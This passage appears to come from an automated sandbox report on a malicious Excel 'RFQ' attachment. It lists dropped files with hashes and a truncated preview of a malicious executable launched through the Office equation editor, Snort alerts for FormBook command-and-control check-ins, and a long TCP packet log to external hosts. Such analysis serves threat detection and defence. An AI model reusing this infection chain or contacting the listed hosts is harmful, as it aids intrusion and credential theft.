                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF464E500D1B1A44AE.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF474EEA2985E340FB.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:CDFV2 Encrypted
                                                  Category:dropped
                                                  Size (bytes):317816
                                                  Entropy (8bit):7.9785869008250065
                                                  Encrypted:false
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  MD5:DA4BEFA8DFE9D56B937B01A2D2818175
                                                  SHA1:CF8E6AE0B8AFB3D3F2956FBE0C88599FB361EDE8
                                                  SHA-256:87F4B613C197B92F31D5EED4C7AD32A8BA4AE68313D56B54FF656F273FB56D86
                                                  SHA-512:421CE4922A5C05C59DC9993AC48DA9D99D990BD9A46587E2BA2116F55889EAD2378239C79154D3EF03178C49F0E6AEE1BC1ECF1E64CDAF450D5D0B2316B6E15D
                                                  Malicious:false
                                                  Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):165
                                                  Entropy (8bit):1.4377382811115937
                                                  Encrypted:false
                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                  Malicious:true
                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  C:\Users\Public\vbc.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..

                                                  Static File Info

                                                  General

                                                  File type:CDFV2 Encrypted
                                                  Entropy (8bit):7.9785869008250065
                                                  TrID:
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                  File name:RFQ HCI20220113.xlsx
                                                  File size:317816
                                                  MD5:da4befa8dfe9d56b937b01a2d2818175
                                                  SHA1:cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
                                                  SHA256:87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
                                                  SHA512:421ce4922a5c05c59dc9993ac48da9d99d990bd9a46587e2ba2116f55889ead2378239c79154d3ef03178c49f0e6aee1bc1ecf1e64cdaf450d5d0b2316b6e15d
                                                  SSDEEP:6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                                  File Icon

                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  01/13/22-20:22:49.687273TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:22:49.687273TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:22:49.687273TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22103.224.212.220
                                                  01/13/22-20:23:00.496770TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:00.496770TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:00.496770TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22122.10.28.11
                                                  01/13/22-20:23:11.619415TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251
                                                  01/13/22-20:23:11.619415TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251
                                                  01/13/22-20:23:11.619415TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.22192.185.98.251

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 13, 2022 20:21:55.579416990 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.694510937 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.694689035 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.695291996 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.811695099 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811763048 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811800003 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811837912 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.811898947 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.811955929 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.926425934 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926457882 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926476002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926496029 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926512957 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926528931 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926544905 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926565886 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:55.926613092 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:55.926655054 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.040818930 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.040985107 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041049004 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041095018 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041099072 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041160107 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041191101 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041201115 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041217089 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041232109 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041234970 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041304111 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041325092 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041343927 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041352034 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041383982 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041393042 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041423082 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041448116 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041462898 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041464090 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041503906 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041517973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041543007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041558981 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041584015 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041584969 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041621923 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.041630983 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.041665077 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.044822931 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156091928 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156125069 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156141996 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156157017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156172991 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156188965 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156203985 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156219959 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156296015 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156311989 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156337023 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156353951 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156366110 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156368971 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156387091 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156404018 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156408072 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156425953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156429052 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156443119 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156459093 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156469107 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156500101 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156510115 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156527042 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156546116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156569958 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156572104 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156583071 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156589031 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156601906 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156619072 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156634092 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156645060 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156651974 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156667948 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156681061 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156682968 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156713963 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156758070 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.160103083 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270792007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270822048 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270838976 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270857096 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270872116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889997 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270905018 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270920992 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270937920 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270945072 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270956993 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270973921 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270991087 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271007061 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271013021 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271027088 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271045923 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271059036 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271061897 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271075964 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271092892 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271094084 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271110058 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271126986 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271128893 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271143913 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271161079 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271159887 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271177053 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271193027 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271209002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271224022 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.271231890 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271259069 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271264076 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.271275997 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274358034 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274384022 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274399996 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274468899 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274486065 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274502039 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274517059 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274518013 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274538040 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274544001 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274559975 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274574995 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274580002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274597883 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274610043 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274615049 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274632931 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274643898 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274648905 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274665117 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274676085 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274682045 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274698019 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274709940 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274714947 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274729967 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274738073 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274746895 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274763107 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274776936 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.274805069 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274848938 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.274853945 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.282037973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.283003092 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.385349989 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385389090 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385407925 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385426044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385448933 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385471106 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385493994 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385516882 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.385658979 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.385691881 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389081955 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389115095 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389137983 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389161110 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389184952 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389208078 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389208078 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389230967 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389235973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389259100 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389273882 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389282942 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389306068 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389328957 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389349937 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389352083 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389368057 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389375925 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389389992 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389395952 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389399052 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389432907 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389477015 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389482021 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389489889 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389501095 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389519930 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389538050 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389558077 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389575958 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389594078 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389609098 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389624119 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389638901 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389652967 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389662027 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389672995 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389678955 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389683008 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389691114 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389695883 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389714003 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389733076 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389744043 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389754057 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389766932 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389775038 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389796972 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389797926 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389817953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389828920 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389839888 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389858007 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389888048 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.390383959 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.397017002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397058964 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397083044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397106886 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397130966 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397193909 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.397241116 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.401489973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.402662992 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.499903917 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.499959946 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.499999046 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500034094 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500037909 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500076056 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500077963 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500085115 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500118017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500130892 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500159025 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500180006 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500199080 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500206947 CET4916780192.168.2.22198.23.213.59
